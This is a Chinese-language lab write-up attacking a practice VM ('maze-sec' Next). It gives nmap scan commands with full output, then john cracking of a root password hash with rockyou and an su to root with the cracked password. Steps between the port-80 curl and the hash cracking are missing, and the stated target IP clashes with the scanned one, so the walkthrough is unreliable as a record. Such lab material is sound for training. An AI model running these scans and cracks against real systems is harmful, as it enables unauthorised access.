┌──(root㉿kali)-[~/miaosec/maze-sec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:05 CST Nmap scan report for 192.168.2.1 Host is up (0.00071s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00036s latency). MAC Address: 08:00:27:F8:17:C0 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.13 Host is up (0.00053s latency). MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds
靶机IP:192.168.2.70
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# nmap --min-rate 10000 -p- 192.168.2.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:15 CST Nmap scan report for 192.168.2.13 Host is up (0.00017s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:16 CST Nmap scan report for 192.168.2.13 Host is up (0.00049s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.62 (Debian) 3000/tcp open ppp? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | X-Powered-By: Next.js | ETag: "wvpz46leg16iz" | Content-Type: text/html; charset=utf-8 | Content-Length: 8460 | Vary: Accept-Encoding | Date: Sun, 14 Sep 2025 15:16:23 GMT | Connection: close | <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title class="jsx-1eb51da0ac6ad36f">maze-sec | Cybersecurity Research</title><link rel="icon" href="/favicon.ico" class="jsx-1eb51da0ac6ad36f"/><meta name="hint" content="Authorized access at a secret endpoint. Try 2025." class="jsx-1eb51da0ac6ad36f"/><meta name="next-head-count" content="5"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><scr | HTTPOptions: | HTTP/1.1 405 Method Not Allowed | Allow: GET | Allow: HEAD | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | X-Powered-By: Next.js | Content-Type: text/html; charset=utf-8 | Vary: Accept-Encoding | Date: Sun, 14 Sep 2025 15:16:23 GMT | Connection: close | <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>405: Method Not Allowed</title><meta name="next-head-count" content="3"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><script src="/_next/static/chunks/main-c396fbccb3dec4e9.js" defer=""></script><script src="/_next/static/chunks/pages/_app-dc14f8483464b560.js" defer=""></scri | Help, NCP: | HTTP/1.1 400 Bad Request |_ Connection: close ... Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
22端口,ssh服务
80端口,http服务
3000端口,ppp服务,可能是node.js应用
3.udp扫描
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# nmap -sU --top-ports 100 192.168.2.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:17 CST Nmap scan report for 192.168.2.13 Host is up (0.00034s latency). All 100 scanned ports on 192.168.2.13 are in ignored states. Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response) MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 57.53 seconds
没有开放的udp端口
4.脚本漏洞扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# nmap --script=vuln -p22,80,3000 192.168.2.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:19 CST Nmap scan report for 192.168.2.13 Host is up (0.00032s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. 3000/tcp open ppp MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 31.34 seconds
没有新的信息
二、WEB渗透
1、80端口
访问80端口
1 2 3
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# curl http://192.168.2.13 No matter where life takes you, keep going NEXT.
┌──(root㉿kali)-[~/miaosec/maze-sec] └─# john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status bisrock (root) 1g 0:00:00:21 DONE (2025-09-15 23:09) 0.04601g/s 2733p/s 2733c/s 2733C/s blueboy1..062906 Use the "--show" option to display all of the cracked passwords reliably Session completed.
成功找打凭证:root:bisrock
6、获取root权限
1 2 3 4
$ su root Password: bisrock root@Next:/home/c1trus# id uid=0(root) gid=0(root) groups=0(root)